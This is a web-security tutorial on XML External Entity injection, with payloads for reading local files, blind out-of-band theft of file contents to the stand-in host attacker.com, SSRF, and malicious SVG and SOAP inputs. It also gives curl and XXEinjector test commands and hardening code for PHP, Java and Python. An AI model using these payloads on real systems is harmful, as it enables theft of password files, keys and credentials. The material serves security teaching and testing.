XML External Entity (XXE) Injection remains one of the most dangerous web vulnerabilities, allowing attackers to interfere with XML processing, read sensitive files, and execute Server-Side Request Forgery (SSRF) attacks. This guide covers exploitation techniques from basic file disclosure to advanced blind XXE scenarios.
Understanding XXE Vulnerabilities
XXE attacks exploit XML parsers that process external entity references within XML documents. When an application accepts XML input without proper configuration, attackers can define custom entities that reference external resources:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<data>&xxe;</data>
</root>
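To make the mechanism concrete, here is a minimal Python sketch that shows what a parser sees in the document above. It uses the standard library's `xml.parsers.expat` and only records entity declarations; the function name `list_external_entities` is an illustrative choice, and no external entity handler is installed, so nothing is read from disk or fetched.

```python
import xml.parsers.expat


def list_external_entities(xml_bytes):
    """Return (name, system_id) for each external general entity declared in the DTD."""
    declared = []

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # External entities carry a system identifier instead of an inline value.
        if system_id is not None and not is_parameter:
            declared.append((name, system_id))

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    # No ExternalEntityRefHandler is set, so the reference in <data> is never resolved.
    parser.Parse(xml_bytes, True)
    return declared


payload = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<data>&xxe;</data>
</root>"""

print(list_external_entities(payload))
```

A vulnerable parser would go one step further and substitute the contents of the referenced resource wherever `&xxe;` appears.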
Types of XXE Attacks
1. In-Band XXE (Classic)
The server directly reflects the entity content in the response, allowing immediate file disclosure:
POST /api/process HTTP/1.1
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<input>&file;</input>
// Response contains /etc/passwd contents
2. Blind XXE
No direct response, but attackers can exfiltrate data via out-of-band channels:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<input>test</input>
// evil.dtd on attacker server:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfil;
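On the receiving side, the exfiltrated value arrives as a query parameter in an ordinary HTTP request. The sketch below, for use during an authorized test, decodes that parameter from a logged request line. The helper name `extract_exfil` and the sample hostname are assumptions for illustration; only the `data` parameter name comes from the payload above.

```python
from urllib.parse import parse_qs, urlsplit


def extract_exfil(request_line):
    """Pull the 'data' query parameter out of a line such as 'GET /?data=... HTTP/1.1'."""
    parts = request_line.split()
    if len(parts) < 2:
        return None
    query = urlsplit(parts[1]).query
    # parse_qs also undoes percent-encoding applied by the target's HTTP client.
    values = parse_qs(query, keep_blank_values=True).get("data")
    return values[0] if values else None


print(extract_exfil("GET /?data=web01.internal.example HTTP/1.1"))
```

A request for `/evil.dtd` with no `data` parameter returns `None`, which helps separate the DTD fetch from the actual callback in the logs.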
3. XXE-Based SSRF
Exploit XML parsers to make server-side requests to internal systems:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://internal-server:8080/admin">
]>
<data>&xxe;</data>
// Access internal services behind firewall
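When triaging captured payloads or parser logs, it can help to label where each SYSTEM identifier points. The following is a rough sketch using only the standard library; the function name and the category labels are illustrative, and hostnames are deliberately not resolved, so a name like `internal-server` is reported as unverified rather than internal.

```python
import ipaddress
from urllib.parse import urlsplit


def classify_system_id(system_id):
    """Roughly label where a SYSTEM identifier points, without resolving DNS."""
    parts = urlsplit(system_id)
    scheme = parts.scheme.lower()
    if scheme == "file":
        return "local-file"
    if scheme not in ("http", "https", "ftp"):
        return "other-scheme"
    host = parts.hostname or ""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # A hostname may resolve to anything, so treat it as unverified.
        return "hostname"
    if addr.is_loopback or addr.is_link_local or addr.is_private:
        return "internal-address"
    return "public-address"


for target in ("file:///etc/passwd", "http://internal-server:8080/admin", "http://127.0.0.1/"):
    print(target, "->", classify_system_id(target))
```

Link-local addresses are included because cloud metadata endpoints commonly live there (for example 169.254.169.254, which is not mentioned in the text above but is a frequent SSRF target).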
Exploitation Techniques
File Disclosure Payloads
// Linux/Unix files
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<!ENTITY xxe SYSTEM "file:///etc/shadow">
<!ENTITY xxe SYSTEM "file:///var/log/apache2/access.log">
// Windows files
<!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
<!ENTITY xxe SYSTEM "file:///C:/Users/Administrator/.ssh/id_rsa">
// Application files
<!ENTITY xxe SYSTEM "file:///var/www/html/config.php">
<!ENTITY xxe SYSTEM "file:///app/credentials.xml">
Parameter Entity Attacks
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % param1 "<!ENTITY param2 'Attack'>">
%param1;
]>
<root>&param2;</root>
XXE in SOAP Services
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header/>
<soap:Body>
<Login>
<Username>&xxe;</Username>
</Login>
</soap:Body>
</soap:Envelope>
Advanced XXE Scenarios
XXE in File Uploads
Many applications parse XML from uploaded files. DOCX and XLSX are ZIP archives of XML parts, SVG is XML itself, and PDFs can embed XML such as XMP metadata. Attackers embed XXE payloads in these formats:
// Malicious SVG file
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg">
<text x="10" y="20">&xxe;</text>
</svg>
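On the defensive side, legitimate Office documents have no reason to carry a DTD, so one option is to inspect uploads before any XML parser touches them. The sketch below is a minimal illustration with the standard library's `zipfile`. The function name, the extension filter, and the 64 KiB prefix limit are assumptions, and a plain byte search will miss parts encoded as UTF-16.

```python
import io
import zipfile


def find_doctype_parts(upload_bytes):
    """Return names of XML parts inside a ZIP-based document that declare a DOCTYPE."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(upload_bytes)) as archive:
        for info in archive.infolist():
            if not info.filename.lower().endswith((".xml", ".rels")):
                continue
            # Read a bounded prefix so a huge part cannot exhaust memory.
            with archive.open(info) as part:
                head = part.read(64 * 1024)
            if b"<!DOCTYPE" in head:
                flagged.append(info.filename)
    return flagged


# Build a tiny in-memory archive that mimics a tampered DOCX.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("[Content_Types].xml", "<Types/>")
    archive.writestr(
        "word/document.xml",
        '<!DOCTYPE d [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><d>&xxe;</d>',
    )

print(find_doctype_parts(buffer.getvalue()))
```

Rejecting any upload for which this list is non-empty is a coarse filter; it complements parser hardening rather than replacing it.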
Error-Based XXE
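Trigger parser errors that leak information in error messages. The simplest probe references a nonexistent file: a verbose error confirms that the parser resolves external entities. Leaking actual file contents this way generally requires a parameter-entity chain that embeds the file's contents in an invalid path, so the parser echoes them back in the error: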
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///nonexistent">
]>
<root>&xxe;</root>
// Error: Failed to load external entity "file:///nonexistent"
Detection and Testing
Manual Testing
# Test with curl
curl -X POST https://target.com/api -H "Content-Type: application/xml" --data '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><data>&xxe;</data>'
# Using Burp Suite Intruder
# Load XXE payloads from SecLists
# Monitor responses for file contents
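The same manual check can be scripted. The sketch below builds the probe request with `urllib.request` without sending it, and adds a simple heuristic for spotting `/etc/passwd`-shaped lines in a response body. Both function names and the regular expression are illustrative assumptions, and the target URL is the placeholder used in the curl example; only send such a request to systems you are authorized to test.

```python
import re
import urllib.request

# Matches lines shaped like "name:password:uid:gid:..." as found in /etc/passwd.
PASSWD_LINE = re.compile(r"^[a-z_][a-z0-9_-]*:[^:]*:\d+:\d+:", re.MULTILINE)


def build_probe(url, system_id="file:///etc/passwd"):
    """Build (but do not send) a POST request carrying a classic XXE probe."""
    body = (
        '<?xml version="1.0"?>'
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{system_id}">]>'
        "<data>&xxe;</data>"
    ).encode("utf-8")
    return urllib.request.Request(
        url, data=body, headers={"Content-Type": "application/xml"}, method="POST"
    )


def looks_like_passwd(response_text):
    """Heuristic: does the response contain a line shaped like an /etc/passwd entry?"""
    return PASSWD_LINE.search(response_text) is not None


request = build_probe("https://target.com/api")
print(request.get_method(), request.full_url)
```

Passing the request to `urllib.request.urlopen` and feeding the decoded body to `looks_like_passwd` would complete the check.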
Automated Tools
- XXEinjector — Automated blind XXE exploitation
- Burp Suite — Scanner extension for XXE detection
- OWASP ZAP — Active scan rules for XXE
# XXEinjector usage
ruby XXEinjector.rb --host=attacker.com --path=/etc/passwd --file=request.txt
# Results:
[+] File /etc/passwd retrieved:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
Remediation Strategies
PHP (libxml)
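<?php
// PHP < 8.0: disable external entity loading explicitly.
// The function is deprecated in PHP 8.0, where libxml >= 2.9.0
// already disables external entity loading by default.
if (PHP_VERSION_ID < 80000) {
    libxml_disable_entity_loader(true);
}
// With DOMDocument, do NOT pass LIBXML_NOENT or LIBXML_DTDLOAD:
// those flags enable entity substitution and external DTD loading.
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NONET); // LIBXML_NONET blocks network access
?>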
Java (JAXP)
// Disable DTD processing
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
Python (lxml)
from lxml import etree
# Safe parser configuration
parser = etree.XMLParser(
    resolve_entities=False,
    no_network=True,
    dtd_validation=False,
    load_dtd=False,
)
tree = etree.parse(xml_file, parser)
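Where lxml is not available, a stricter policy can be sketched with the standard library alone: refuse any document that declares a DOCTYPE before handing it to a parser. The names `DoctypeForbidden` and `parse_without_doctype` are illustrative assumptions, and the document is parsed twice for simplicity.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def parse_without_doctype(xml_bytes):
    """Reject any document that declares a DOCTYPE, then parse it with ElementTree."""

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE '{name}' is not allowed")

    checker = xml.parsers.expat.ParserCreate()
    checker.StartDoctypeDeclHandler = on_doctype
    # The handler raises as soon as the DOCTYPE is seen.
    checker.Parse(xml_bytes, True)
    return ET.fromstring(xml_bytes)


print(parse_without_doctype(b"<data>ok</data>").text)
```

This trades flexibility for safety: documents that legitimately rely on a DTD are rejected too, which is usually acceptable for API input.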
Real-World Impact
- Facebook (2018) — XXE in image processing allowed file disclosure
- LinkedIn (2012) — XXE via DOCX file uploads
- Google (2017) — XXE in Blogger XML import feature
Conclusion
XXE vulnerabilities continue to plague modern applications, especially those processing XML-based document formats. Implement parser hardening, disable external entity processing, and conduct regular security assessments to protect against these critical attacks.
